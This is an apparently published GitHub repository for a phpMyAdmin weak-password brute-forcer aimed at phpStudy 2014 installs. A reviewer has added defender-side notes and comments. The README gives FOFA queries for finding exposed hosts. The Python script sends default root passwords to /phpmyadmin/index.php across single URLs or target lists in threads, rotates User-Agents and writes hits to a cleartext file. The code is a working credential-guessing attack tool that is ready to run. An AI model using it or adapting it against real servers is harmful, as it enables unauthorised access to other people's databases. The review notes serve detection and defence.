# Repository layout (as published):
#   ├── README.md
#   └── phpmyadmin2014.py
#
# /README.md:
#   # phpmyadmin2014
#   phpmyadmin2014 weak-password brute force
#   ![be604719573897d54a254d56392aa2e](https://github.com/user-attachments/assets/a7a60851-dcc8-4baf-99ae-77e2a77fe3de)
#   fofa:
#   "phpstudy" && title=="phpStudy 探针 2014 "
#   body="phpstudy探针" && title="phpStudy 探针 2014"
#
# /phpmyadmin2014.py:
#
# Review notes (defender view):
# - Traffic shape: one POST per guess to <base>/phpmyadmin/index.php carrying
#   the form fields pma_username, pma_password and server=1. The account is
#   always "root" and at most three passwords are sent per host.
# - Every request takes its User-Agent at random from user-agents.txt, so a
#   detection should key on the path, the source address and the short burst
#   of root logins rather than on the client string.
# - A host is only reported when root accepts one of the three passwords
#   listed in bao(); a non-default root password and a /phpmyadmin/ path that
#   is not reachable from untrusted networks close the finding.
# - verify=False switches off TLS certificate validation for every request.
# - Hits are appended to results.txt as cleartext URL, username and password.
import argparse
import requests
import concurrent.futures
import sys
import random


def bao(url):
    """Try the built-in root credentials against one phpMyAdmin login page.

    Args:
        url: Base URL of the host; '/phpmyadmin/index.php' is appended to it.

    Side effects:
        Reads user-agents.txt before every request, prints a line for a hit or
        a connection failure, and appends each hit to results.txt.

    Only requests.exceptions.ConnectionError is handled here; any other
    exception (for example a missing user-agents.txt) propagates to the caller.
    """
    login_url = url + '/phpmyadmin/index.php'
    for account in ['root']:
        # Guess the site's username and password from this fixed list.
        for candidate in ['123456', '111111', 'root']:
            form = {
                "pma_username": account,
                "pma_password": candidate,
                "server": "1",
            }
            try:
                # Load every user agent from user-agents.txt and pick one at random.
                with open('user-agents.txt', 'r') as ua_file:
                    ua_lines = ua_file.readlines()
                chosen_ua = random.choice(ua_lines).strip()
                resp = requests.post(
                    login_url,
                    data=form,
                    headers={'User-Agent': chosen_ua},
                    verify=False,  # certificate validation is disabled
                    allow_redirects=True,
                    timeout=5,
                )
                # A hit is HTTP 200 plus this marker text in the body.
                # NOTE(review): presumably the marker only appears after a
                # successful login; that cannot be confirmed from this file.
                if resp.status_code != 200 or 'phpMyAdmin phpStudy 2014' not in resp.text:
                    continue
                print('\033[1;31m[+]%s Login Success! \nusername:%s & password:%s\033[0m' % (login_url, account, candidate))
                # The credentials are stored in cleartext.
                with open('results.txt', 'a') as out:
                    out.write(login_url + ' username:%s & password:%s' % (account, candidate) + '\n')
                # Stop guessing passwords after a successful login.
                break
            except requests.exceptions.ConnectionError:
                print("连接失败")
                break


def pl(filename):
    """Return the lines of *filename* (UTF-8), each stripped of surrounding whitespace."""
    with open(filename, 'r', encoding='utf-8') as handle:
        return [entry.strip() for entry in handle.readlines()]


# NOTE: this function shadows the built-in help().
def help():
    """Print the banner and the three usage lines."""
    # NOTE: the backslashes in the banner are not valid escape sequences;
    # Python keeps them literally but recent versions warn about them.
    helpinfo = """ _ _ _ ___ ___ __ _ _
| | | | (_) |__ \ / _ \/_ | || |
_ __ | |__ _ __ _ __ ___ _ _ __ _ __| |_ __ ___ _ _ __ ) | | | || | || |_
| '_ \| '_ \| '_ \| '_ ` _ \| | | |/ _` |/ _` | '_ ` _ \| | '_ \ / /| | | || |__ _|
| |_) | | | | |_) | | | | | | |_| | (_| | (_| | | | | | | | | | |_ / /_| |_| || | | |
| .__/|_| |_| .__/|_| |_| |_|\__, |\__,_|\__,_|_| |_| |_|_|_| |_(_)____|\___/ |_| |_|
| | | | __/ |
|_| |_| |___/
"""
    prog = sys.argv[0]
    print(helpinfo)
    print("phpmyadmin2014".center(100, '*'))
    for usage in (
        f"[+]{prog} -u --url http://www.xxx.com 即可进行单个漏洞检测",
        f"[+]{prog} -f --file targetUrl.txt 即可对选中文档中的网址进行批量检测",
        f"[+]{prog} -h --help 查看更多详细帮助信息",
    ):
        print(usage)
    print("--@ztomato".rjust(100, " "))


def main():
    """Parse the command line and run bao() on one URL or on every URL in a file.

    With neither -u nor -f the banner and usage text are printed instead.
    """
    parser = argparse.ArgumentParser(description='phpmyadmin2014弱口令漏洞单批检测脚本@ztomato')
    parser.add_argument('-u', '--url', type=str, help='单个漏洞网址')
    parser.add_argument('-f', '--file', type=str, help='批量检测文本')
    parser.add_argument('-t', '--thread', type=int, help='线程,默认为5')
    args = parser.parse_args()

    # A missing or zero -t value falls back to five workers.
    workers = args.thread if args.thread else 5

    if args.url:
        bao(args.url)
        return
    if not args.file:
        help()
        return

    targets = pl(args.file)
    with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as pool:
        # The iterator returned by map() is never consumed, so an exception
        # raised inside a worker is not re-raised here.
        pool.map(bao, targets)


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------